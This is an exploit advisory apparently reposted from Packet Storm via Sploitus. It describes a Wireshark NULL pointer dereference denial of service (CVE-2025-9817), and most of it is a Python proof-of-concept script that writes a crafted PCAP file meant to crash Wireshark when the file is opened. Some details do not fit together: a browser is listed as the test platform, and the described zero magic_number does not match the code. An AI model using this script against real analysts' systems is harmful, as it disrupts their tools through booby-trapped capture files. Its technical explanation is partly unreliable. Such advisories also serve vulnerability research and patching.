## https://sploitus.com/exploit?id=PACKETSTORM:216466
=============================================================================================================================================
| # Title : Wireshark NULL Pointer Dereference via Malicious PCAP |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits) |
| # Vendor : https://www.wireshark.org/ |
=============================================================================================================================================
[+] References : https://packetstorm.news/files/id/214684/ & CVE-2025-9817
[+] Summary : Wireshark is a widely used network traffic analysis tool that relies on protocol dissectors to parse packet data.
This report documents a NULL Pointer Dereference vulnerability pattern that can be triggered by opening a specially crafted PCAP file.
The provided Proof of Concept (PoC) is written in Python and demonstrates how malformed packet fields may cause Wireshark to crash if
a vulnerable dissector incorrectly interprets packet data as valid memory references.
This issue results in a Denial of Service (DoS) condition only. No code execution is demonstrated.
A packet field (magic_number) is set to 0x00000000 and later interpreted as a pointer without proper validation.
[+] PoC : python3 poc.py crash.pcap
#!/usr/bin/env python3
import struct
import sys
def create_malicious_pcap(filename):
with open(filename, 'wb') as f:
f.write(struct.pack('@ I H H i I I I',
0xa1b2c3d4,
2, 4,
0,
0,
65535,
1
))
ts_sec = 1000
ts_usec = 0
eth_dst = b'\xff\xff\xff\xff\xff\xff'
eth_src = b'\x00\x11\x22\x33\x44\x55'
eth_type = b'\x08\x00'
ip_header = bytes([
0x45, 0x00, 0x00, 0x3c,
0x12, 0x34,
0x40, 0x00,
0x40,
0x99,
0x00, 0x00,
0xc0, 0xa8, 0x01, 0x01,
0xc0, 0xa8, 0x01, 0xff
])
malicious_payload = bytes([
0x01,
0xFF,
0x00, 0x00,
0x80,
0x00, 0x00, 0x00, 0x00
])
incl_len = len(eth_dst) + len(eth_src) + len(eth_type) + \
len(ip_header) + len(malicious_payload)
f.write(struct.pack('@ I I I I',
ts_sec, ts_usec, incl_len, incl_len))
f.write(eth_dst)
f.write(eth_src)
f.write(eth_type)
f.write(ip_header)
f.write(malicious_payload)
print(f"Created: {filename}")
if __name__ == "__main__":
if len(sys.argv) != 2:
print(f"Usage: {sys.argv[0]} <output.pcap>")
sys.exit(1)
create_malicious_pcap(sys.argv[1])
Greetings to :============================================================
jericho * Larry W. Cashdollar * r00t * Malvuln (John Page aka hyp3rlinx)*|
==========================================================================